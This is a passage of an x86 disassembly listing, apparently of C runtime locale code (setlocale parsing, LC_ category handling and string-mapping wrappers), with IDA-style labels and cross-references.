retn
sub_422F30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422F40 proc near ; CODE XREF: sub_41A5E0+11E�p
; sub_41A5E0+16F�p ...
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_433020
push offset sub_425F84
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFDCh
push ebx
push esi
push edi
mov [ebp+var_18], esp
cmp dword_492158, 0
jnz short loc_422FC6
push 0
push 0
push 1
push offset dword_43301C
push 100h
push 0
call ds:dword_494478
test eax, eax
jz short loc_422F97
mov dword_492158, 1
jmp short loc_422FC6
; ---------------------------------------------------------------------------
loc_422F97: ; CODE XREF: sub_422F40+49�j
push 0
push 0
push 1
push offset dword_433018
push 100h
push 0
call ds:dword_494474
test eax, eax
jz short loc_422FBF
mov dword_492158, 2
jmp short loc_422FC6
; ---------------------------------------------------------------------------
loc_422FBF: ; CODE XREF: sub_422F40+71�j
xor eax, eax
jmp loc_423231
; ---------------------------------------------------------------------------
loc_422FC6: ; CODE XREF: sub_422F40+2D�j
; sub_422F40+55�j ...
cmp [ebp+arg_C], 0
jle short loc_422FDF
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
call sub_423250
add esp, 8
mov [ebp+arg_C], eax
loc_422FDF: ; CODE XREF: sub_422F40+8A�j
cmp dword_492158, 2
jnz short loc_42300B
mov edx, [ebp+arg_14]
push edx
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call ds:dword_494474
jmp loc_423231
; ---------------------------------------------------------------------------
loc_42300B: ; CODE XREF: sub_422F40+A6�j
cmp dword_492158, 1
jnz loc_42322F
cmp [ebp+arg_18], 0
jnz short loc_423027
mov edx, dword_492180
mov [ebp+arg_18], edx
loc_423027: ; CODE XREF: sub_422F40+DC�j
push 0
push 0
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_1C]
neg edx
sbb edx, edx
and edx, 8
add edx, 1
push edx
mov eax, [ebp+arg_18]
push eax
call ds:dword_4942D4
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jnz short loc_42305B
xor eax, eax
jmp loc_423231
; ---------------------------------------------------------------------------
loc_42305B: ; CODE XREF: sub_422F40+112�j
mov [ebp+var_4], 0
mov eax, [ebp+var_1C]
shl eax, 1
add eax, 3
and al, 0FCh
call sub_418D40
mov [ebp+var_30], esp
mov [ebp+var_18], esp
mov ecx, [ebp+var_30]
mov [ebp+var_24], ecx
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_42309D
; ---------------------------------------------------------------------------
mov eax, 1
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_24], 0
mov [ebp+var_4], 0FFFFFFFFh
loc_42309D: ; CODE XREF: sub_422F40+144�j
cmp [ebp+var_24], 0
jnz short loc_4230AA
xor eax, eax
jmp loc_423231
; ---------------------------------------------------------------------------
loc_4230AA: ; CODE XREF: sub_422F40+161�j
mov edx, [ebp+var_1C]
push edx
mov eax, [ebp+var_24]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
push 1
mov eax, [ebp+arg_18]
push eax
call ds:dword_4942D4
test eax, eax
jnz short loc_4230D1
xor eax, eax
jmp loc_423231
; ---------------------------------------------------------------------------
loc_4230D1: ; CODE XREF: sub_422F40+188�j
push 0
push 0
mov ecx, [ebp+var_1C]
push ecx
mov edx, [ebp+var_24]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call ds:dword_494478
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jnz short loc_4230FB
xor eax, eax
jmp loc_423231
; ---------------------------------------------------------------------------
loc_4230FB: ; CODE XREF: sub_422F40+1B2�j
mov edx, [ebp+arg_4]
and edx, 400h
test edx, edx
jz short loc_42314B
cmp [ebp+arg_14], 0
jz short loc_423146
mov eax, [ebp+var_28]
cmp eax, [ebp+arg_14]
jle short loc_42311D
xor eax, eax
jmp loc_423231
; ---------------------------------------------------------------------------
loc_42311D: ; CODE XREF: sub_422F40+1D4�j
mov ecx, [ebp+arg_14]
push ecx
mov edx, [ebp+arg_10]
push edx
mov eax, [ebp+var_1C]
push eax
mov ecx, [ebp+var_24]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call ds:dword_494478
test eax, eax
jnz short loc_423146
xor eax, eax
jmp loc_423231
; ---------------------------------------------------------------------------
loc_423146: ; CODE XREF: sub_422F40+1CC�j
; sub_422F40+1FD�j
jmp loc_42322A
; ---------------------------------------------------------------------------
loc_42314B: ; CODE XREF: sub_422F40+1C6�j
mov ecx, [ebp+var_28]
mov [ebp+var_2C], ecx
mov [ebp+var_4], 1
mov eax, [ebp+var_2C]
shl eax, 1
add eax, 3
and al, 0FCh
call sub_418D40
mov [ebp+var_34], esp
mov [ebp+var_18], esp
mov edx, [ebp+var_34]
mov [ebp+var_20], edx
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_423193
; ---------------------------------------------------------------------------
mov eax, 1
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_20], 0
mov [ebp+var_4], 0FFFFFFFFh
loc_423193: ; CODE XREF: sub_422F40+23A�j
cmp [ebp+var_20], 0
jnz short loc_4231A0
xor eax, eax
jmp loc_423231
; ---------------------------------------------------------------------------
loc_4231A0: ; CODE XREF: sub_422F40+257�j
mov eax, [ebp+var_2C]
push eax
mov ecx, [ebp+var_20]
push ecx
mov edx, [ebp+var_1C]
push edx
mov eax, [ebp+var_24]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call ds:dword_494478
test eax, eax
jnz short loc_4231C6
xor eax, eax
jmp short loc_423231
; ---------------------------------------------------------------------------
loc_4231C6: ; CODE XREF: sub_422F40+280�j
cmp [ebp+arg_14], 0
jnz short loc_4231FA
push 0
push 0
push 0
push 0
mov eax, [ebp+var_2C]
push eax
mov ecx, [ebp+var_20]
push ecx
push 220h
mov edx, [ebp+arg_18]
push edx
call ds:dword_4943B0
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jnz short loc_4231F8
xor eax, eax
jmp short loc_423231
; ---------------------------------------------------------------------------
loc_4231F8: ; CODE XREF: sub_422F40+2B2�j
jmp short loc_42322A
; ---------------------------------------------------------------------------
loc_4231FA: ; CODE XREF: sub_422F40+28A�j
push 0
push 0
mov eax, [ebp+arg_14]
push eax
mov ecx, [ebp+arg_10]
push ecx
mov edx, [ebp+var_2C]
push edx
mov eax, [ebp+var_20]
push eax
push 220h
mov ecx, [ebp+arg_18]
push ecx
call ds:dword_4943B0
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jnz short loc_42322A
xor eax, eax
jmp short loc_423231
; ---------------------------------------------------------------------------
loc_42322A: ; CODE XREF: sub_422F40:loc_423146�j
; sub_422F40:loc_4231F8�j ...
mov eax, [ebp+var_28]
jmp short loc_423231
; ---------------------------------------------------------------------------
loc_42322F: ; CODE XREF: sub_422F40+D2�j
xor eax, eax
loc_423231: ; CODE XREF: sub_422F40+81�j
; sub_422F40+C6�j ...
lea esp, [ebp-40h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_422F40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423250 proc near ; CODE XREF: sub_422F40+94�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 8
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov [ebp+var_4], ecx
loc_423262: ; CODE XREF: sub_423250+35�j
mov edx, [ebp+var_8]
mov eax, [ebp+var_8]
sub eax, 1
mov [ebp+var_8], eax
test edx, edx
jz short loc_423287
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_423287
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
jmp short loc_423262
; ---------------------------------------------------------------------------
loc_423287: ; CODE XREF: sub_423250+20�j
; sub_423250+2A�j
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
test edx, edx
jnz short loc_423299
mov eax, [ebp+var_4]
sub eax, [ebp+arg_0]
jmp short loc_42329C
; ---------------------------------------------------------------------------
loc_423299: ; CODE XREF: sub_423250+3F�j
mov eax, [ebp+arg_4]
loc_42329C: ; CODE XREF: sub_423250+47�j
mov esp, ebp
pop ebp
retn
sub_423250 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0B0h
cmp dword ptr [ebp+8], 0
jl short loc_4232B5
cmp dword ptr [ebp+8], 5
jle short loc_4232BC
loc_4232B5: ; CODE XREF: .text:004232AD�j
xor eax, eax
jmp loc_42368B
; ---------------------------------------------------------------------------
loc_4232BC: ; CODE XREF: .text:004232B3�j
push 13h
call sub_41BC90
add esp, 4
mov dword ptr [ebp-4], 1
mov eax, dword_492748
add eax, 1
mov dword_492748, eax
loc_4232DA: ; CODE XREF: .text:004232EB�j
cmp dword_49274C, 0
jz short loc_4232ED
push 1
call ds:dword_4942D8
jmp short loc_4232DA
; ---------------------------------------------------------------------------
loc_4232ED: ; CODE XREF: .text:004232E1�j
cmp dword ptr [ebp+8], 0
jz short loc_423331
cmp dword ptr [ebp+0Ch], 0
jz short loc_423311
mov ecx, [ebp+0Ch]
push ecx
mov edx, [ebp+8]
push edx
call sub_423690
add esp, 8
mov [ebp-0A8h], eax
jmp short loc_423323
; ---------------------------------------------------------------------------
loc_423311: ; CODE XREF: .text:004232F7�j
mov eax, [ebp+8]
imul eax, 0Ch
mov ecx, dword_443494[eax]
mov [ebp-0A8h], ecx
loc_423323: ; CODE XREF: .text:0042330F�j
mov edx, [ebp-0A8h]
mov [ebp-8], edx
jmp loc_42366B
; ---------------------------------------------------------------------------
loc_423331: ; CODE XREF: .text:004232F1�j
mov dword ptr [ebp-14h], 1
mov dword ptr [ebp-0Ch], 0
cmp dword ptr [ebp+0Ch], 0
jz loc_423663
mov eax, [ebp+0Ch]
movsx ecx, byte ptr [eax]
cmp ecx, 4Ch
jnz loc_423574
mov edx, [ebp+0Ch]
movsx eax, byte ptr [edx+1]
cmp eax, 43h
jnz loc_423574
mov ecx, [ebp+0Ch]
movsx edx, byte ptr [ecx+2]
cmp edx, 5Fh
jnz loc_423574
mov eax, [ebp+0Ch]
mov [ebp-9Ch], eax
loc_423381: ; CODE XREF: .text:00423543�j
push offset asc_43307C ; "=;"
mov ecx, [ebp-9Ch]
push ecx
call sub_42AC80
add esp, 8
mov [ebp-0A0h], eax
cmp dword ptr [ebp-0A0h], 0
jz short loc_4233CD
mov edx, [ebp-0A0h]
sub edx, [ebp-9Ch]
mov [ebp-0A4h], edx
cmp dword ptr [ebp-0A4h], 0
jz short loc_4233CD
mov eax, [ebp-0A0h]
movsx ecx, byte ptr [eax]
cmp ecx, 3Bh
jnz short loc_4233F3
loc_4233CD: ; CODE XREF: .text:004233A2�j
; .text:004233BD�j
cmp dword ptr [ebp-4], 0
jz short loc_4233EC
push 13h
call sub_41BD30
add esp, 4
mov edx, dword_492748
sub edx, 1
mov dword_492748, edx
loc_4233EC: ; CODE XREF: .text:004233D1�j
xor eax, eax
jmp loc_42368B
; ---------------------------------------------------------------------------
loc_4233F3: ; CODE XREF: .text:004233CB�j
mov dword ptr [ebp-10h], 1
jmp short loc_423405
; ---------------------------------------------------------------------------
loc_4233FC: ; CODE XREF: .text:loc_423451�j
mov eax, [ebp-10h]
add eax, 1
mov [ebp-10h], eax
loc_423405: ; CODE XREF: .text:004233FA�j
cmp dword ptr [ebp-10h], 5
jg short loc_423453
mov ecx, [ebp-0A4h]
push ecx
mov edx, [ebp-9Ch]
push edx
mov eax, [ebp-10h]
imul eax, 0Ch
mov ecx, off_443490[eax]
push ecx
call sub_41B790
add esp, 0Ch
test eax, eax
jnz short loc_423451
mov edx, [ebp-10h]
imul edx, 0Ch
mov eax, off_443490[edx]
push eax
call sub_418E70
add esp, 4
cmp [ebp-0A4h], eax
jnz short loc_423451
jmp short loc_423453
; ---------------------------------------------------------------------------
loc_423451: ; CODE XREF: .text:00423430�j
; .text:0042344D�j
jmp short loc_4233FC
; ---------------------------------------------------------------------------
loc_423453: ; CODE XREF: .text:00423409�j
; .text:0042344F�j
push offset asc_433078 ; ";"
mov ecx, [ebp-0A0h]
add ecx, 1
mov [ebp-0A0h], ecx
mov edx, [ebp-0A0h]
push edx
call sub_42AC40
add esp, 8
mov [ebp-0A4h], eax
cmp dword ptr [ebp-0A4h], 0
jnz short loc_4234B9
mov eax, [ebp-0A0h]
movsx ecx, byte ptr [eax]
cmp ecx, 3Bh
jz short loc_4234B9
cmp dword ptr [ebp-4], 0
jz short loc_4234B2
push 13h
call sub_41BD30
add esp, 4
mov edx, dword_492748
sub edx, 1
mov dword_492748, edx
loc_4234B2: ; CODE XREF: .text:00423497�j
xor eax, eax
jmp loc_42368B
; ---------------------------------------------------------------------------
loc_4234B9: ; CODE XREF: .text:00423483�j
; .text:00423491�j
cmp dword ptr [ebp-10h], 5
jg short loc_42350A
mov eax, [ebp-0A4h]
push eax
mov ecx, [ebp-0A0h]
push ecx
lea edx, [ebp-98h]
push edx
call sub_4191A0
add esp, 0Ch
mov eax, [ebp-0A4h]
mov byte ptr [ebp+eax-98h], 0
lea ecx, [ebp-98h]
push ecx
mov edx, [ebp-10h]
push edx
call sub_423690
add esp, 8
test eax, eax
jz short loc_42350A
mov eax, [ebp-0Ch]
add eax, 1
mov [ebp-0Ch], eax
loc_42350A: ; CODE XREF: .text:004234BD�j
; .text:004234FF�j
mov ecx, [ebp-0A0h]
add ecx, [ebp-0A4h]
mov [ebp-9Ch], ecx
mov edx, [ebp-9Ch]
movsx eax, byte ptr [edx]
test eax, eax
jz short loc_423538
mov ecx, [ebp-9Ch]
add ecx, 1
mov [ebp-9Ch], ecx
loc_423538: ; CODE XREF: .text:00423527�j
mov edx, [ebp-9Ch]
movsx eax, byte ptr [edx]
test eax, eax
jnz loc_423381
cmp dword ptr [ebp-0Ch], 0
jz short loc_42355C
call sub_423830
mov [ebp-0ACh], eax
jmp short loc_423566
; ---------------------------------------------------------------------------
loc_42355C: ; CODE XREF: .text:0042354D�j
mov dword ptr [ebp-0ACh], 0
loc_423566: ; CODE XREF: .text:0042355A�j
mov ecx, [ebp-0ACh]
mov [ebp-8], ecx
jmp loc_423661
; ---------------------------------------------------------------------------
loc_423574: ; CODE XREF: .text:00423352�j
; .text:00423362�j ...
mov edx, [ebp+8]
push edx
push 0
push 0
lea eax, [ebp-98h]
push eax
mov ecx, [ebp+0Ch]
push ecx
call sub_423930
add esp, 14h
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jz loc_423661
mov dword ptr [ebp-10h], 0
jmp short loc_4235AE
; ---------------------------------------------------------------------------
loc_4235A5: ; CODE XREF: .text:loc_42360E�j
mov edx, [ebp-10h]
add edx, 1
mov [ebp-10h], edx
loc_4235AE: ; CODE XREF: .text:004235A3�j
cmp dword ptr [ebp-10h], 5
jg short loc_423610
cmp dword ptr [ebp-10h], 0
jz short loc_42360E
mov eax, [ebp-10h]
imul eax, 0Ch
mov ecx, dword_443494[eax]
push ecx
lea edx, [ebp-98h]
push edx
call sub_419360
add esp, 8
test eax, eax
jz short loc_423605
lea eax, [ebp-98h]
push eax
mov ecx, [ebp-10h]
push ecx
call sub_423690
add esp, 8
test eax, eax
jz short loc_4235FC
mov edx, [ebp-0Ch]
add edx, 1
mov [ebp-0Ch], edx
jmp short loc_423603
; ---------------------------------------------------------------------------
loc_4235FC: ; CODE XREF: .text:004235EF�j
mov dword ptr [ebp-14h], 0
loc_423603: ; CODE XREF: .text:004235FA�j
jmp short loc_42360E
; ---------------------------------------------------------------------------
loc_423605: ; CODE XREF: .text:004235D8�j
mov eax, [ebp-0Ch]
add eax, 1
mov [ebp-0Ch], eax
loc_42360E: ; CODE XREF: .text:004235B8�j
; .text:loc_423603�j
jmp short loc_4235A5
; ---------------------------------------------------------------------------
loc_423610: ; CODE XREF: .text:004235B2�j
cmp dword ptr [ebp-14h], 0
jz short loc_42363B
call sub_423830
mov [ebp-8], eax
push 2
mov ecx, dword_443494
push ecx
call sub_4174C0
add esp, 8
mov dword_443494, 0
jmp short loc_423661
; ---------------------------------------------------------------------------
loc_42363B: ; CODE XREF: .text:00423614�j
cmp dword ptr [ebp-0Ch], 0
jz short loc_42364E
call sub_423830
mov [ebp-0B0h], eax
jmp short loc_423658
; ---------------------------------------------------------------------------
loc_42364E: ; CODE XREF: .text:0042363F�j
mov dword ptr [ebp-0B0h], 0
loc_423658: ; CODE XREF: .text:0042364C�j
mov edx, [ebp-0B0h]
mov [ebp-8], edx
loc_423661: ; CODE XREF: .text:0042356F�j
; .text:00423596�j ...
jmp short loc_42366B
; ---------------------------------------------------------------------------
loc_423663: ; CODE XREF: .text:00423343�j
call sub_423830
mov [ebp-8], eax
loc_42366B: ; CODE XREF: .text:0042332C�j
; .text:loc_423661�j
cmp dword ptr [ebp-4], 0
jz short loc_423688
push 13h
call sub_41BD30
add esp, 4
mov eax, dword_492748
sub eax, 1
mov dword_492748, eax
loc_423688: ; CODE XREF: .text:0042366F�j
mov eax, [ebp-8]
loc_42368B: ; CODE XREF: .text:004232B7�j
; .text:004233EE�j ...
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423690 proc near ; CODE XREF: .text:00423301�p
; .text:004234F5�p ...
var_A8 = dword ptr -0A8h
var_A0 = dword ptr -0A0h
var_9C = byte ptr -9Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0A8h
mov eax, [ebp+arg_0]
push eax
lea ecx, [ebp+var_A0]
push ecx
lea edx, [ebp+var_A8]
push edx
lea eax, [ebp+var_9C]
push eax
mov ecx, [ebp+arg_4]
push ecx
call sub_423930
add esp, 14h
test eax, eax
jnz short loc_4236C9
xor eax, eax
jmp loc_42381F
; ---------------------------------------------------------------------------
loc_4236C9: ; CODE XREF: sub_423690+30�j
push 132h
push offset aSetlocal_c ; "setlocal.c"
push 2
lea edx, [ebp+var_9C]
push edx
call sub_418E70
add esp, 4
add eax, 1
push eax
call sub_416A30
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_423700
xor eax, eax
jmp loc_42381F
; ---------------------------------------------------------------------------
loc_423700: ; CODE XREF: sub_423690+67�j
mov eax, [ebp+arg_0]
imul eax, 0Ch
mov ecx, dword_443494[eax]
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
mov eax, dword_492168[edx*4]
mov [ebp+var_4], eax
push 6
mov ecx, [ebp+arg_0]
imul ecx, 6
add ecx, offset dword_4922E4
push ecx
lea edx, [ebp+var_14]
push edx
call sub_418A00
add esp, 0Ch
mov eax, dword_492180
mov [ebp+var_18], eax
lea ecx, [ebp+var_9C]
push ecx
mov edx, [ebp+var_8]
push edx
call sub_419FA0
add esp, 8
mov ecx, [ebp+arg_0]
imul ecx, 0Ch
mov dword_443494[ecx], eax
mov edx, [ebp+var_A8]
and edx, 0FFFFh
mov eax, [ebp+arg_0]
mov dword_492168[eax*4], edx
push 6
lea ecx, [ebp+var_A8]
push ecx
mov edx, [ebp+arg_0]
imul edx, 6
add edx, offset dword_4922E4
push edx
call sub_418A00
add esp, 0Ch
cmp [ebp+arg_0], 2
jnz short loc_4237A3
mov eax, [ebp+var_A0]
mov dword_492180, eax
loc_4237A3: ; CODE XREF: sub_423690+106�j
cmp [ebp+arg_0], 1
jnz short loc_4237B5
mov ecx, [ebp+var_A0]
mov dword_492184, ecx
loc_4237B5: ; CODE XREF: sub_423690+117�j
mov edx, [ebp+arg_0]
imul edx, 0Ch
call off_443498[edx]
test eax, eax
jz short loc_4237FC
mov eax, [ebp+arg_0]
imul eax, 0Ch
mov ecx, [ebp+var_C]
mov dword_443494[eax], ecx
push 2
mov edx, [ebp+var_8]
push edx
call sub_4174C0
add esp, 8
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
mov dword_492168[eax*4], ecx
mov edx, [ebp+var_18]
mov dword_492180, edx
xor eax, eax
jmp short loc_42381F
; ---------------------------------------------------------------------------
loc_4237FC: ; CODE XREF: sub_423690+133�j
cmp [ebp+var_C], offset dword_443380
jz short loc_423813
push 2
mov eax, [ebp+var_C]
push eax
call sub_4174C0
add esp, 8
loc_423813: ; CODE XREF: sub_423690+173�j
mov ecx, [ebp+arg_0]
imul ecx, 0Ch
mov eax, dword_443494[ecx]
loc_42381F: ; CODE XREF: sub_423690+34�j
; sub_423690+6B�j ...
mov esp, ebp
pop ebp
retn
sub_423690 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423830 proc near ; CODE XREF: .text:0042354F�p
; .text:00423616�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], 1
cmp dword_443494, 0
jnz short loc_423864
push 167h
push offset aSetlocal_c ; "setlocal.c"
push 2
push 351h
call sub_416A30
add esp, 10h
mov dword_443494, eax
loc_423864: ; CODE XREF: sub_423830+14�j
mov eax, dword_443494
mov byte ptr [eax], 0
mov [ebp+var_4], 1
jmp short loc_42387E
; ---------------------------------------------------------------------------
loc_423875: ; CODE XREF: sub_423830:loc_423927�j
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_42387E: ; CODE XREF: sub_423830+43�j
mov edx, [ebp+var_4]
imul edx, 0Ch
mov eax, dword_443494[edx]
push eax
push offset asc_43308C ; "="
mov ecx, [ebp+var_4]
imul ecx, 0Ch
mov edx, off_443490[ecx]
push edx
push 3
mov eax, dword_443494
push eax
call sub_423AD0
add esp, 14h
cmp [ebp+var_4], 5
jge short loc_4238F9
push offset asc_433078 ; ";"
mov ecx, dword_443494
push ecx
call sub_419FB0
add esp, 8
mov edx, [ebp+var_4]
add edx, 1
imul edx, 0Ch
mov eax, dword_443494[edx]
push eax
mov ecx, [ebp+var_4]
imul ecx, 0Ch
mov edx, dword_443494[ecx]
push edx
call sub_419360
add esp, 8
test eax, eax
jz short loc_4238F7
mov [ebp+var_8], 0
loc_4238F7: ; CODE XREF: sub_423830+BE�j
jmp short loc_423927
; ---------------------------------------------------------------------------
loc_4238F9: ; CODE XREF: sub_423830+81�j
cmp [ebp+var_8], 0
jnz short loc_423906
mov eax, dword_443494
jmp short loc_42392C
; ---------------------------------------------------------------------------
loc_423906: ; CODE XREF: sub_423830+CD�j
push 2
mov eax, dword_443494
push eax
call sub_4174C0
add esp, 8
mov dword_443494, 0
mov eax, off_4434AC
jmp short loc_42392C
; ---------------------------------------------------------------------------
loc_423927: ; CODE XREF: sub_423830:loc_4238F7�j
jmp loc_423875
; ---------------------------------------------------------------------------
loc_42392C: ; CODE XREF: sub_423830+D4�j
; sub_423830+F5�j
mov esp, ebp
pop ebp
retn
sub_423830 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423930 proc near ; CODE XREF: .text:00423587�p
; sub_423690+26�p
var_88 = byte ptr -88h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 88h
cmp [ebp+arg_0], 0
jnz short loc_423946
xor eax, eax
jmp loc_423AB0
; ---------------------------------------------------------------------------
loc_423946: ; CODE XREF: sub_423930+D�j
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
cmp ecx, 43h
jnz short loc_4239A0
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx+1]
test eax, eax
jnz short loc_4239A0
mov ecx, [ebp+arg_4]
mov byte ptr [ecx], 43h
mov edx, [ebp+arg_4]
mov byte ptr [edx+1], 0
cmp [ebp+arg_8], 0
jz short loc_423989
mov eax, [ebp+arg_8]
mov word ptr [eax], 0
mov ecx, [ebp+arg_8]
mov word ptr [ecx+2], 0
mov edx, [ebp+arg_8]
mov word ptr [edx+4], 0
loc_423989: ; CODE XREF: sub_423930+3D�j
cmp [ebp+arg_C], 0
jz short loc_423998
mov eax, [ebp+arg_C]
mov dword ptr [eax], 0
loc_423998: ; CODE XREF: sub_423930+5D�j
mov eax, [ebp+arg_4]
jmp loc_423AB0
; ---------------------------------------------------------------------------
loc_4239A0: ; CODE XREF: sub_423930+1F�j
; sub_423930+2A�j
mov ecx, [ebp+arg_0]
push ecx
push offset dword_443408
call sub_419360
add esp, 8
test eax, eax
jz loc_423A68
mov edx, [ebp+arg_0]
push edx
push offset dword_443384
call sub_419360
add esp, 8
test eax, eax
jz loc_423A68
mov eax, [ebp+arg_0]
push eax
lea ecx, [ebp+var_88]
push ecx
call sub_423B20
add esp, 8
test eax, eax
jz short loc_4239F0
xor eax, eax
jmp loc_423AB0
; ---------------------------------------------------------------------------
loc_4239F0: ; CODE XREF: sub_423930+B7�j
lea edx, [ebp+var_88]
push edx
push offset dword_49215C
lea eax, [ebp+var_88]
push eax
call sub_42ACC0
add esp, 0Ch
test eax, eax
jnz short loc_423A16
xor eax, eax
jmp loc_423AB0
; ---------------------------------------------------------------------------
loc_423A16: ; CODE XREF: sub_423930+DD�j
xor ecx, ecx
mov cx, word_492160
mov dword_492164, ecx
lea edx, [ebp+var_88]
push edx
push offset dword_443408
call sub_423C80
add esp, 8
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_423A56
mov edx, [ebp+arg_0]
push edx
push offset dword_443384
call sub_419FA0
add esp, 8
jmp short loc_423A68
; ---------------------------------------------------------------------------
loc_423A56: ; CODE XREF: sub_423930+111�j
push offset dword_443408
push offset dword_443384
call sub_419FA0
add esp, 8
loc_423A68: ; CODE XREF: sub_423930+83�j
; sub_423930+9C�j ...
cmp [ebp+arg_8], 0
jz short loc_423A81
push 6
push offset dword_49215C
mov eax, [ebp+arg_8]
push eax
call sub_418A00
add esp, 0Ch
loc_423A81: ; CODE XREF: sub_423930+13C�j
cmp [ebp+arg_C], 0
jz short loc_423A9A
push 4
push offset dword_492164
mov ecx, [ebp+arg_C]
push ecx
call sub_418A00
add esp, 0Ch
loc_423A9A: ; CODE XREF: sub_423930+155�j
push offset dword_443408
mov edx, [ebp+arg_4]
push edx
call sub_419FA0
add esp, 8
mov eax, offset dword_443408
loc_423AB0: ; CODE XREF: sub_423930+11�j
; sub_423930+6B�j ...
mov esp, ebp
pop ebp
retn
sub_423930 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423AC0 proc near ; CODE XREF: sub_423690+12B�p
; DATA XREF: .data:off_443498�o
push ebp
mov ebp, esp
xor eax, eax
pop ebp
retn
sub_423AC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423AD0 proc near ; CODE XREF: sub_423830+75�p
; sub_423C80+30�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 8
lea eax, [ebp+arg_8]
mov [ebp+var_4], eax
mov [ebp+var_8], 0
jmp short loc_423AEE
; ---------------------------------------------------------------------------
loc_423AE5: ; CODE XREF: sub_423AD0+42�j
mov ecx, [ebp+var_8]
add ecx, 1
mov [ebp+var_8], ecx
loc_423AEE: ; CODE XREF: sub_423AD0+13�j
mov edx, [ebp+var_8]
cmp edx, [ebp+arg_4]
jge short loc_423B14
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
mov edx, [ecx-4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_419FB0
add esp, 8
jmp short loc_423AE5
; ---------------------------------------------------------------------------
loc_423B14: ; CODE XREF: sub_423AD0+24�j
mov [ebp+var_4], 0
mov esp, ebp
pop ebp
retn
sub_423AD0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423B20 proc near ; CODE XREF: sub_423930+AD�p
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push 88h
push 0
mov eax, [ebp+arg_0]
push eax
call sub_4189A0
add esp, 0Ch
mov ecx, [ebp+arg_4]
movsx edx, byte ptr [ecx]
test edx, edx
jnz short loc_423B4A
xor eax, eax
jmp loc_423C79
